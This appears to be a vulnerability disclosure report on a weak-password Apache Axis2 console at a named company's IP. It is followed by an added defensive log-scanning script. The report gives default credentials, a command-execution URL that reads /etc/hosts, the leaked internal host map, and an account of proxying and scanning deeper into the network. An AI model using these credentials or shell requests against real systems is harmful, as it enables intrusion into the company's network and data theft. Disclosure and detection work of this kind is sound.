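Vulnerability details: I came across this purely by chance. A weak password on Axis2 led to getshell, after which I roamed the internal network a bit.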
http://211.151.59.27:80/axis2/axis2-admin/login
admin:axis2
Proof of vulnerability: getshell
http://211.151.59.27/axis2/services/Cat/exec?cmd=cat%20/etc/hosts
The hosts file shows that this is a NetQin (网秦) service.
HEADER: This file was autogenerated at Thu Aug 21 16:56:16 +0800 2014
# HEADER: by puppet. While it can still be managed manually, it
# HEADER: is definitely not recommended.
# Do not remove the following line, or various programs
# that require network functionality will fail.
127.0.0.1 localhost.localdomain localhost BJ-YZ-S-ST040
::1 localhost6.localdomain6 localhost6
127.0.0.1 oversea
192.168.3.46 bjyz.puppet.nq.com
192.168.0.41 a03 pbsvc.nqcloud.com comcon.netqin.com cn-pbsvc.nq.com pbsvc.nq.com cn-pbsvc-dl.nq.com i-contact.netqin.com
192.168.0.217 a12 app.netqin.com
211.151.59.71 a09 blyt.netqin.com
192.168.0.143 a08 i.netqin.com i.nq.com m.nq.com
192.168.5.212 a13 c.cpsserver.cns
192.168.0.148 a05 nqses.nq.com
192.168.3.35 a11 pay.netqin.com pay.nq.com
192.168.3.53 a07 my.netqin.com
192.168.3.52 a06 mpay.nq.com my.nq.com jf.netqin.com wurfl.netqin.com wapcms.netqin.com r.netqin.cn wap.netqin.com ad.netqin.com new.netqin.com
192.168.5.216 a15 dbapp.nq.com
192.168.5.207 a16 dbboss.nq.com
192.168.5.218 a14 dbuis.nq.com
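With the shell in hand, I opened a proxy into the internal network using reGeorg.
I scanned the internal network segments with nmap; the internal network is fairly large.
It involves a large number of internal systems: wiki, Jenkins, Jira, internal management systems, a meeting-room booking system, a report management system and so on, as well as a large amount of development and test documentation.
Programmers' bug rate per thousand lines of code….
With Jenkins, many more machines can be taken over.
Point cards can be requested..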
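
A defender-side check for the two request patterns this report shows (the Axis2 admin console reached from outside, and a deployed service called with a cmd parameter), added here as an example and not part of the original report. The admin network allowlist, the rule names and the sample log lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: the only networks allowed to reach the Axis2 admin console.
ADMIN_NETS = [ipaddress.ip_network("10.0.0.0/8")]
# Query parameter names treated as command-execution markers ("cmd" is the one in the report).
SUSPECT_PARAMS = {"cmd"}
# Common/combined log format: client ident user [time] "METHOD target PROTO" status
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(line):
    """Return (rule, client, target) for a suspicious request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, _method, target, _status = m.groups()
    url = urlsplit(target)
    path = url.path.lower()
    if path.startswith("/axis2/axis2-admin/"):
        try:
            external = not any(ipaddress.ip_address(client) in n for n in ADMIN_NETS)
        except ValueError:  # hostname logged instead of an IP: treat as external
            external = True
        if external:
            return ("admin-console-external", client, target)
    if path.startswith("/axis2/services/"):
        # parse_qs URL-decodes names, so an encoded parameter name is still matched
        names = {k.lower() for k in parse_qs(url.query, keep_blank_values=True)}
        if names & SUSPECT_PARAMS:
            return ("service-command-param", client, target)
    return None

def scan(lines):
    """Classify every log line and keep only the findings."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '10.1.2.3 - - [21/Aug/2014:16:50:01 +0800] "POST /axis2/axis2-admin/login HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Aug/2014:16:51:10 +0800] "POST /axis2/axis2-admin/login HTTP/1.1" 200 512',
    '203.0.113.9 - - [21/Aug/2014:16:53:42 +0800] "GET /axis2/services/Cat/exec?cmd=cat%20/etc/hosts HTTP/1.1" 200 1830',
    '198.51.100.7 - - [21/Aug/2014:16:54:00 +0800] "GET /axis2/services/Version/getVersion HTTP/1.1" 200 230',
]

if __name__ == "__main__":
    for rule, client, target in scan(SAMPLE_LOG):
        print(rule, client, target)
```

The same findings point at the fix for the root cause in this report: change the default admin:axis2 credentials and keep the admin console unreachable from untrusted networks.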